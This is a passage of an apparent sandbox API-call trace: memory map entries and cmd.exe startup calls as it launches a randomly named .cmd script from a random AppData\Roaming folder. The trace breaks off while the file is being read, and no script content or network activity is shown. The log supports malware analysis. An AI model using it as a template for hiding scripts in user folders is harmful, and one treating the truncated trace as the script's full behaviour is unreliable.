"pagefile_0x0000000000140000" filename = "" Region: id = 8807 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8808 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8809 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8810 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8811 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8812 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8899 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8900 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8901 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 8902 start_va = 0x280000 end_va = 0x2e6fff entry_point = 0x280000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8903 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8904 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8905 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8906 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8907 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8908 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8909 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8910 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8911 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8912 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8913 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 8914 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8915 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8916 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 8917 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 8918 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8919 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 8920 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 8921 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 8922 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 8962 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8963 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8964 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8965 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 9039 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 105 os_tid = 0xecc [0117.970] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f7f4 | out: lpSystemTimeAsFileTime=0x12f7f4*(dwLowDateTime=0x838efd80, dwHighDateTime=0x1d440a9)) [0117.970] GetCurrentProcessId () returned 0xec8 [0117.970] GetCurrentThreadId () returned 0xecc [0117.970] GetTickCount () returned 0x27f6b [0117.970] QueryPerformanceCounter (in: lpPerformanceCount=0x12f7ec | out: lpPerformanceCount=0x12f7ec*=17475922038) returned 1 [0117.971] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0117.971] __set_app_type (_Type=0x1) [0117.971] __p__fmode () returned 0x76b331f4 [0117.971] __p__commode () returned 0x76b331fc [0117.971] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0117.971] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0117.971] GetCurrentThreadId () returned 0xecc [0117.972] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xecc) returned 0x38 [0117.972] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.972] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0117.972] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.972] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f784 | out: phkResult=0x12f784*=0x0) returned 0x2 [0117.972] VirtualQuery (in: lpAddress=0x12f7bb, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.975] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.975] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.975] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.975] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0117.975] GetConsoleOutputCP () returned 0x1b5 [0117.976] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.976] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0117.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.976] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0117.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.976] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.976] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.976] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.977] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.977] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.977] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0117.977] GetEnvironmentStringsW () returned 0x190150* [0117.977] FreeEnvironmentStringsW (penv=0x190150) returned 1 [0117.977] GetEnvironmentStringsW () returned 0x190150* [0117.978] FreeEnvironmentStringsW (penv=0x190150) returned 1 [0117.978] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e6f4 | out: phkResult=0x12e6f4*=0x40) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x0, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x1, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x1, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x0, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x40, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x40, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x40, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegCloseKey (hKey=0x40) returned 0x0 [0117.978] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e6f4 | out: phkResult=0x12e6f4*=0x40) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x40, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x1, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x1, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x0, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.979] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x9, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.979] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x9, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.979] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x9, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.979] RegCloseKey (hKey=0x40) returned 0x0 [0117.979] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635e [0117.979] srand (_Seed=0x5b88635e) [0117.979] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"" [0117.979] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"" [0117.979] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.979] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1919b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0117.980] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.980] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.980] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0117.980] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.980] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.980] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.980] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.980] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.980] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.980] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.980] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.980] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0117.980] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.980] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f4c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.980] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f4c0, lpFilePart=0x12f4bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f4bc*="Desktop") returned 0x18 [0117.980] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.981] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f23c | out: lpFindFileData=0x12f23c) returned 0x18ffe0 [0117.981] FindClose (in: hFindFile=0x18ffe0 | out: hFindFile=0x18ffe0) returned 1 [0117.981] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f23c | out: lpFindFileData=0x12f23c) returned 0x18ffe0 [0117.981] FindClose (in: hFindFile=0x18ffe0 | out: hFindFile=0x18ffe0) returned 1 [0117.981] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f23c | out: lpFindFileData=0x12f23c) returned 0x18ffe0 [0117.981] FindClose (in: hFindFile=0x18ffe0 | out: hFindFile=0x18ffe0) returned 1 [0117.981] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.981] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0117.981] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.982] GetEnvironmentStringsW () returned 0x190150* [0117.982] FreeEnvironmentStringsW (penv=0x190150) returned 1 [0117.982] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.984] GetConsoleOutputCP () returned 0x1b5 [0117.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.984] GetUserDefaultLCID () returned 0x409 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f600, cchData=128 | out: lpLCData="0") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f600, cchData=128 | out: lpLCData="0") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f600, cchData=128 | out: lpLCData="1") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0117.986] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0117.986] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.987] GetConsoleTitleW (in: lpConsoleTitle=0x1901e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.139] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0118.140] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0118.140] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0118.140] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0118.144] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd", _String2=")") returned 58 [0118.144] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 3 [0118.144] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 3 [0118.144] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 6 [0118.144] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 6 [0118.144] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 15 [0118.144] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 15 [0118.148] GetConsoleTitleW (in: lpConsoleTitle=0x12f2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.148] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.149] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f0b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f0ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f0ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0118.149] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0118.149] SetErrorMode (uMode=0x0) returned 0x0 [0118.149] SetErrorMode (uMode=0x1) returned 0x0 [0118.149] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x19dc08, lpFilePart=0x12ee18 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x12ee18*="vMfCCeRYkvQy") returned 0x2d [0118.150] SetErrorMode (uMode=0x0) returned 0x1 [0118.150] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0118.150] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.155] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.155] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd", fInfoLevelId=0x1, lpFindFileData=0x12ebb4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ebb4) returned 0x1908f0 [0118.155] FindClose (in: hFindFile=0x1908f0 | out: hFindFile=0x1908f0) returned 1 [0118.155] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0118.155] GetConsoleTitleW (in: lpConsoleTitle=0x12f08c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.155] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0118.159] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0118.159] IdentifyCodeAuthzLevelW () returned 0x1 [0118.169] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0118.169] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0118.169] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0118.169] CloseCodeAuthzLevel () returned 0x1 [0118.169] SetErrorMode (uMode=0x0) returned 0x0 [0118.169] SetErrorMode (uMode=0x1) returned 0x0 [0118.169] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd", nBufferLength=0x104, lpBuffer=0x1904e8, lpFilePart=0x12ef78 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd", lpFilePart=0x12ef78*="WlLsor5U.cmd") returned 0x3a [0118.169] SetErrorMode (uMode=0x0) returned 0x1 [0118.169] CmdBatNotification () returned 0x0 [0118.169] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12efbc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0118.170] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0118.170] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.170] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.170] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.170] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.170] ReadFile (in: hFile=0x58, 